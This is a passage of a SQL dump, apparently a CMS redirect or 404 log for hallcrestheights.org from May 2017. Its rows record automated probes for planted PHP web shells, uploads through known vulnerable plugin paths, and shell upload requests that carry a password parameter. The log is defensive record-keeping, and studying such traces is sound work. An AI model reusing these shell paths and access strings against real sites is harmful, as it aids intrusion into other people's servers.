00:00:00'),(9210,'http://hallcrestheights.org//images/xxx.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:54:58','0000-00-00 00:00:00'),(9211,'http://hallcrestheights.org//al277.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:04','0000-00-00 00:00:00'),(9212,'http://hallcrestheights.org//wp-admin/options-media.php?z3=MndOUVY0LnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:10','0000-00-00 00:00:00'),(9213,'http://hallcrestheights.org//wp-content/advanced-cache.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:15','0000-00-00 00:00:00'),(9214,'http://hallcrestheights.org//roubt.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:22','0000-00-00 00:00:00'),(9215,'http://hallcrestheights.org//includes.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:28','0000-00-00 00:00:00'),(9216,'http://hallcrestheights.org//images/al277.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:32','0000-00-00 00:00:00'),(9217,'http://hallcrestheights.org//webconfig.txt.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:36','0000-00-00 00:00:00'),(9218,'http://hallcrestheights.org//cache/cachee.php?z3=MndOUVY0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:47','0000-00-00 00:00:00'),(9219,'http://hallcrestheights.org//thumb.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:55:51','0000-00-00 00:00:00'),(9220,'http://hallcrestheights.org//configbak.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:05','0000-00-00 00:00:00'),(9221,'http://hallcrestheights.org//wp-main.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:10','0000-00-00 00:00:00'),(9222,'http://hallcrestheights.org//robot.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:16','0000-00-00 00:00:00'),(9223,'http://hallcrestheights.org//install.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:22','0000-00-00 00:00:00'),(9224,'http://hallcrestheights.org//images/1ndex.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:28','0000-00-00 00:00:00'),(9225,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=MndOUVY0LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:35','0000-00-00 00:00:00'),(9226,'http://hallcrestheights.org//resd.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:40','0000-00-00 00:00:00'),(9227,'http://hallcrestheights.org//injctory.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:47','0000-00-00 00:00:00'),(9228,'http://hallcrestheights.org//mmytc.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:56:53','0000-00-00 00:00:00'),(9229,'http://hallcrestheights.org//M-F4r3s.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:00','0000-00-00 00:00:00'),(9230,'http://hallcrestheights.org//images/laj.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:07','0000-00-00 00:00:00'),(9231,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=MndOUVY0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:13','0000-00-00 00:00:00'),(9232,'http://hallcrestheights.org//wsdl.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:19','0000-00-00 00:00:00'),(9233,'http://hallcrestheights.org//goog1es.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:24','0000-00-00 00:00:00'),(9234,'http://hallcrestheights.org//wp-admin/network/rnnvhs.php?z3=MndOUVY0LnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:31','0000-00-00 00:00:00'),(9235,'http://hallcrestheights.org//wp-admin/about.php?z3=MndOUVY0LnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:37','0000-00-00 00:00:00'),(9236,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=MndOUVY0LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:43','0000-00-00 00:00:00'),(9237,'http://hallcrestheights.org//update.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:49','0000-00-00 00:00:00'),(9238,'http://hallcrestheights.org//news.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:57:56','0000-00-00 00:00:00'),(9239,'http://hallcrestheights.org//SessionController.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:02','0000-00-00 00:00:00'),(9240,'http://hallcrestheights.org//maill.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:09','0000-00-00 00:00:00'),(9241,'http://hallcrestheights.org//error-log.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:20','0000-00-00 00:00:00'),(9242,'http://hallcrestheights.org//M-J!r4ya-F4r3s.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:26','0000-00-00 00:00:00'),(9243,'http://hallcrestheights.org//authenticating.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:32','0000-00-00 00:00:00'),(9244,'http://hallcrestheights.org//google-assist.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:38','0000-00-00 00:00:00'),(9245,'http://hallcrestheights.org//images/google-assist.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:45','0000-00-00 00:00:00'),(9246,'http://hallcrestheights.org//images/robots.txt.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:50','0000-00-00 00:00:00'),(9247,'http://hallcrestheights.org//elements.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:58:56','0000-00-00 00:00:00'),(9248,'http://hallcrestheights.org//xmlsrpc.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:03','0000-00-00 00:00:00'),(9249,'http://hallcrestheights.org//wp-cache.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:09','0000-00-00 00:00:00'),(9250,'http://hallcrestheights.org//images/404.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:14','0000-00-00 00:00:00'),(9251,'http://hallcrestheights.org//images/head.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:17','0000-00-00 00:00:00'),(9252,'http://hallcrestheights.org//cache/support.php?z3=MndOUVY0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:20','0000-00-00 00:00:00'),(9253,'http://hallcrestheights.org//RoseLeif.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:24','0000-00-00 00:00:00'),(9254,'http://hallcrestheights.org//Abbrevsprl.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:31','0000-00-00 00:00:00'),(9255,'http://hallcrestheights.org//show.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:37','0000-00-00 00:00:00'),(9256,'http://hallcrestheights.org//images/defau1t.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:42','0000-00-00 00:00:00'),(9257,'http://hallcrestheights.org//cli/40dd1d.php?z3=MndOUVY0LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:48','0000-00-00 00:00:00'),(9258,'http://hallcrestheights.org//bk.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-13 23:59:53','0000-00-00 00:00:00'),(9259,'http://hallcrestheights.org//infos.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:06','0000-00-00 00:00:00'),(9260,'http://hallcrestheights.org//cache/defau1t.php?z3=MndOUVY0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:11','0000-00-00 00:00:00'),(9261,'http://hallcrestheights.org//A.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:17','0000-00-00 00:00:00'),(9262,'http://hallcrestheights.org//bookmark.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:22','0000-00-00 00:00:00'),(9263,'http://hallcrestheights.org//wp-data.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:34','0000-00-00 00:00:00'),(9264,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:40','0000-00-00 00:00:00'),(9265,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:47','0000-00-00 00:00:00'),(9266,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:53','0000-00-00 00:00:00'),(9267,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:00:59','0000-00-00 00:00:00'),(9268,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:05','0000-00-00 00:00:00'),(9269,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-05-14 00:01:09','0000-00-00 00:00:00'),(9270,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:13','0000-00-00 00:00:00'),(9271,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:17','0000-00-00 00:00:00'),(9272,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:20','0000-00-00 00:00:00'),(9273,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:29','0000-00-00 00:00:00'),(9274,'http://hallcrestheights.org//head.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:36','0000-00-00 00:00:00'),(9275,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:48','0000-00-00 00:00:00'),(9276,'http://hallcrestheights.org//wp-content/plugins/morepaddy.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:01:54','0000-00-00 00:00:00'),(9277,'http://hallcrestheights.org//cache/list.php?z3=MndOUVY0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:00','0000-00-00 00:00:00'),(9278,'http://hallcrestheights.org//images/interface.php?z3=MndOUVY0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:06','0000-00-00 00:00:00'),(9279,'http://hallcrestheights.org//sqldebug.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:13','0000-00-00 00:00:00'),(9280,'http://hallcrestheights.org//xmlrpc-activate.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:18','0000-00-00 00:00:00'),(9281,'http://hallcrestheights.org//keep.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:36','0000-00-00 00:00:00'),(9282,'http://hallcrestheights.org//tmpos.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:42','0000-00-00 00:00:00'),(9283,'http://hallcrestheights.org//link.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:48','0000-00-00 00:00:00'),(9284,'http://hallcrestheights.org//dcodzu.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:02:53','0000-00-00 00:00:00'),(9285,'http://hallcrestheights.org//codd.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:00','0000-00-00 00:00:00'),(9286,'http://hallcrestheights.org//cache/wcache7675n.PHP?z3=MndOUVY0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:06','0000-00-00 00:00:00'),(9287,'http://hallcrestheights.org//modules/mod_bookmark/helper.php?z3=MndOUVY0LnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:12','0000-00-00 00:00:00'),(9288,'http://hallcrestheights.org//content.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:17','0000-00-00 00:00:00'),(9289,'http://hallcrestheights.org//wp-content/plugins/sfn.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:23','0000-00-00 00:00:00'),(9290,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:27','0000-00-00 00:00:00'),(9291,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=MndOUVY0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:33','0000-00-00 00:00:00'),(9292,'http://hallcrestheights.org//shootmei.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:39','0000-00-00 00:00:00'),(9293,'http://hallcrestheights.org//dcodqg.php?z3=MndOUVY0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-14 00:03:45','0000-00-00 00:00:00'),(9294,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/2wNQV4.php',NULL,'','',1,0,'2017-05-14 00:03:53','0000-00-00 00:00:00'),(9295,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/2wNQV4.php',NULL,'','',1,0,'2017-05-14 00:03:56','0000-00-00 00:00:00'),(9296,'http://hallcrestheights.org//wp-content/uploads/2wNQV4.php',NULL,'','',1,0,'2017-05-14 00:04:00','0000-00-00 00:00:00'),(9297,'http://hallcrestheights.org//2wNQV4.php',NULL,'','',1,0,'2017-05-14 00:04:03','0000-00-00 00:00:00'),(9298,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/2wNQV4.php',NULL,'','',1,0,'2017-05-14 00:04:06','0000-00-00 00:00:00'),(9299,'http://hallcrestheights.org//wp-includes/css/admin-bar-rtl.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-14 00:04:33','0000-00-00 00:00:00'),(9300,'http://hallcrestheights.org//nowayfile.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-14 00:04:34','0000-00-00 00:00:00'),(9301,'http://hallcrestheights.org//wp-content/plugins/wp-file/lang/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',4,0,'2017-05-14 00:05:00','0000-00-00 00:00:00'),(9302,'http://www.hallcrestheights.org/jgletky-mdrqznrv-i20162632-mlkswazv-k42028-kecqqne-eiaqjz.htm',NULL,'http://search.yahoo.co.jp/','',11,0,'2017-05-14 01:35:37','0000-00-00 00:00:00'),(9303,'http://www.hallcrestheights.org/yembjv-k58549-htqqdckz-fltz-i20162628-terqb-wnsw-nsnjplp-ftrrjnc/',NULL,'https://www.google.ca/','',3,0,'2017-05-14 02:51:21','0000-00-00 00:00:00'),(9304,'http://hallcrestheights.org/components/com_content/models/hgfgjytrehgfdxcgh.php',NULL,'http://hallcrestheights.org/components/com_content/models/hgfgjytrehgfdxcgh.php','',1,0,'2017-05-14 14:22:04','0000-00-00 00:00:00'),(9305,'http://hallcrestheights.org/components/com_jce/editor/extensions/popups/jcemediabox/update.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/extensions/popups/jcemediabox/update.php','',1,0,'2017-05-14 14:22:04','0000-00-00 00:00:00'),(9306,'http://hallcrestheights.org/components/com_content/t8rzzb.php',NULL,'http://hallcrestheights.org/components/com_content/t8rzzb.php','',1,0,'2017-05-14 14:22:04','0000-00-00 00:00:00'),(9307,'http://hallcrestheights.org/components/com_content/mods.php',NULL,'http://hallcrestheights.org/components/com_content/mods.php','',1,0,'2017-05-14 14:22:04','0000-00-00 00:00:00'),(9308,'http://hallcrestheights.org/components/com_finder/yf23d0.php',NULL,'http://hallcrestheights.org/components/com_finder/yf23d0.php','',1,0,'2017-05-14 14:22:04','0000-00-00 00:00:00'),(9309,'http://hallcrestheights.org/components/com_config/view/cms/print_r.php',NULL,'http://hallcrestheights.org/components/com_config/view/cms/print_r.php','',1,0,'2017-05-14 14:22:04','0000-00-00 00:00:00'),(9310,'http://hallcrestheights.org/components/com_finder/models/setup.php',NULL,'http://hallcrestheights.org/components/com_finder/models/setup.php','',1,0,'2017-05-14 14:22:05','0000-00-00 00:00:00'),(9311,'http://hallcrestheights.org/components/com_banners/models/backup.php',NULL,'http://hallcrestheights.org/components/com_banners/models/backup.php','',1,0,'2017-05-14 14:22:05','0000-00-00 00:00:00'),(9312,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/layer/backup.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/layer/backup.php','',1,0,'2017-05-14 14:22:37','0000-00-00 00:00:00'),(9313,'http://hallcrestheights.org/images/banners/smile.php',NULL,'http://hallcrestheights.org/images/banners/smile.php','',4,0,'2017-05-14 14:22:37','0000-00-00 00:00:00'),(9314,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/importcss/xml_get_current_line_number.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/importcss/xml_get_current_line_number.php','',1,0,'2017-05-14 14:22:37','0000-00-00 00:00:00'),(9315,'http://hallcrestheights.org/favicon.php',NULL,'http://hallcrestheights.org/favicon.php','',1,0,'2017-05-14 14:22:37','0000-00-00 00:00:00'),(9316,'http://hallcrestheights.org/images/foro_hacia_donde_va_el_tolima/version.php',NULL,'http://hallcrestheights.org/images/foro_hacia_donde_va_el_tolima/version.php','',1,0,'2017-05-14 14:22:37','0000-00-00 00:00:00'),(9317,'http://hallcrestheights.org/images/documentos/version.php',NULL,'http://hallcrestheights.org/images/documentos/version.php','',1,0,'2017-05-14 14:22:37','0000-00-00 00:00:00'),(9318,'http://hallcrestheights.org/images/1qze7gy.php',NULL,'http://hallcrestheights.org/images/1qze7gy.php','',1,0,'2017-05-14 14:22:37','0000-00-00 00:00:00'),(9319,'http://hallcrestheights.org/db.php',NULL,'http://hallcrestheights.org/db.php','',1,0,'2017-05-14 14:22:38','0000-00-00 00:00:00'),(9320,'http://hallcrestheights.org/gmlt.php',NULL,'http://hallcrestheights.org/gmlt.php','',1,0,'2017-05-14 14:22:38','0000-00-00 00:00:00'),(9321,'http://hallcrestheights.org/images/from.php',NULL,'http://hallcrestheights.org/images/from.php','',1,0,'2017-05-14 14:22:38','0000-00-00 00:00:00'),(9322,'http://hallcrestheights.org/error.php',NULL,'http://hallcrestheights.org/error.php','',7,0,'2017-05-14 14:22:38','0000-00-00 00:00:00'),(9323,'http://hallcrestheights.org/images/cmsbuild.php',NULL,'http://hallcrestheights.org/images/cmsbuild.php','',1,0,'2017-05-14 14:22:38','0000-00-00 00:00:00'),(9324,'http://hallcrestheights.org/images/banners/setup.php',NULL,'http://hallcrestheights.org/images/banners/setup.php','',1,0,'2017-05-14 14:22:38','0000-00-00 00:00:00'),(9325,'http://hallcrestheights.org/images/56731933787a0.php',NULL,'http://hallcrestheights.org/images/56731933787a0.php','',1,0,'2017-05-14 14:22:38','0000-00-00 00:00:00'),(9326,'http://hallcrestheights.org/images/sys.php',NULL,'http://hallcrestheights.org/images/sys.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9327,'http://hallcrestheights.org/images/loptof.php',NULL,'http://hallcrestheights.org/images/loptof.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9328,'http://hallcrestheights.org/images/pot.php',NULL,'http://hallcrestheights.org/images/pot.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9329,'http://hallcrestheights.org/images/mainplag.php',NULL,'http://hallcrestheights.org/images/mainplag.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9330,'http://hallcrestheights.org/images/xml-rpcc.php',NULL,'http://hallcrestheights.org/images/xml-rpcc.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9331,'http://hallcrestheights.org/images/res.php',NULL,'http://hallcrestheights.org/images/res.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9332,'http://hallcrestheights.org/ipqt7a.php',NULL,'http://hallcrestheights.org/ipqt7a.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9333,'http://hallcrestheights.org/ini.php',NULL,'http://hallcrestheights.org/ini.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9334,'http://hallcrestheights.org/images/legacy.cms.php',NULL,'http://hallcrestheights.org/images/legacy.cms.php','',1,0,'2017-05-14 14:23:39','0000-00-00 00:00:00'),(9335,'http://hallcrestheights.org/includes.php',NULL,'http://hallcrestheights.org/includes.php','',55,0,'2017-05-14 14:23:40','0000-00-00 00:00:00'),(9336,'http://hallcrestheights.org/images/img.php',NULL,'http://hallcrestheights.org/images/img.php','',1,0,'2017-05-14 14:23:40','0000-00-00 00:00:00'),(9337,'http://hallcrestheights.org/images/imageshark.php',NULL,'http://hallcrestheights.org/images/imageshark.php','',1,0,'2017-05-14 14:23:40','0000-00-00 00:00:00'),(9338,'http://hallcrestheights.org/images/set.php',NULL,'http://hallcrestheights.org/images/set.php','',2,0,'2017-05-14 14:23:40','0000-00-00 00:00:00'),(9339,'http://hallcrestheights.org/libraries/rokcommon/doctrine/connection/mssql/config.php',NULL,'http://hallcrestheights.org/libraries/rokcommon/doctrine/connection/mssql/config.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9340,'http://hallcrestheights.org/media/system/system.php',NULL,'http://hallcrestheights.org/media/system/system.php','',2,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9341,'http://hallcrestheights.org/libraries/rokcommon/overrides/doctrine/migration/config.php',NULL,'http://hallcrestheights.org/libraries/rokcommon/overrides/doctrine/migration/config.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9342,'http://hallcrestheights.org/layouts/joomla/edit/backup.php',NULL,'http://hallcrestheights.org/layouts/joomla/edit/backup.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9343,'http://hallcrestheights.org/libraries/cms/component/stopgloal.php',NULL,'http://hallcrestheights.org/libraries/cms/component/stopgloal.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9344,'http://hallcrestheights.org/logs/sh404sef/sec/backup.php',NULL,'http://hallcrestheights.org/logs/sh404sef/sec/backup.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9345,'http://hallcrestheights.org/libraries/joomla/google/data/picasa/config.php',NULL,'http://hallcrestheights.org/libraries/joomla/google/data/picasa/config.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9346,'http://hallcrestheights.org/libraries/jquery/v1.11.0/loc.php',NULL,'http://hallcrestheights.org/libraries/jquery/v1.11.0/loc.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9347,'http://hallcrestheights.org/logs/sh404sef/sec/config.php',NULL,'http://hallcrestheights.org/logs/sh404sef/sec/config.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9348,'http://hallcrestheights.org/media/plg_system_stats/version.php',NULL,'http://hallcrestheights.org/media/plg_system_stats/version.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9349,'http://hallcrestheights.org/logs/sh404sef/sec/sowkt/ijos.php',NULL,'http://hallcrestheights.org/logs/sh404sef/sec/sowkt/ijos.php','',1,0,'2017-05-14 14:24:08','0000-00-00 00:00:00'),(9350,'http://hallcrestheights.org/media/editors/tinymce/plugins/paste/config.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/paste/config.php','',1,0,'2017-05-14 14:24:09','0000-00-00 00:00:00'),(9351,'http://hallcrestheights.org/layouts/joomla/content/info_block/backup.php',NULL,'http://hallcrestheights.org/layouts/joomla/content/info_block/backup.php','',1,0,'2017-05-14 14:24:09','0000-00-00 00:00:00'),(9352,'http://hallcrestheights.org/media/editors/tinymce/plugins/advlist/backup.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/advlist/backup.php','',1,0,'2017-05-14 14:24:09','0000-00-00 00:00:00'),(9353,'http://hallcrestheights.org/modules/mod_sp_quickcontact/assets/stopgloal.php',NULL,'http://hallcrestheights.org/modules/mod_sp_quickcontact/assets/stopgloal.php','',1,0,'2017-05-14 14:24:42','0000-00-00 00:00:00'),(9354,'http://hallcrestheights.org/modules/mod_login/version.php',NULL,'http://hallcrestheights.org/modules/mod_login/version.php','',1,0,'2017-05-14 14:24:42','0000-00-00 00:00:00'),(9355,'http://hallcrestheights.org/modules/mod_itpgads_5034/plugins.php',NULL,'http://hallcrestheights.org/modules/mod_itpgads_5034/plugins.php','',1,0,'2017-05-14 14:24:42','0000-00-00 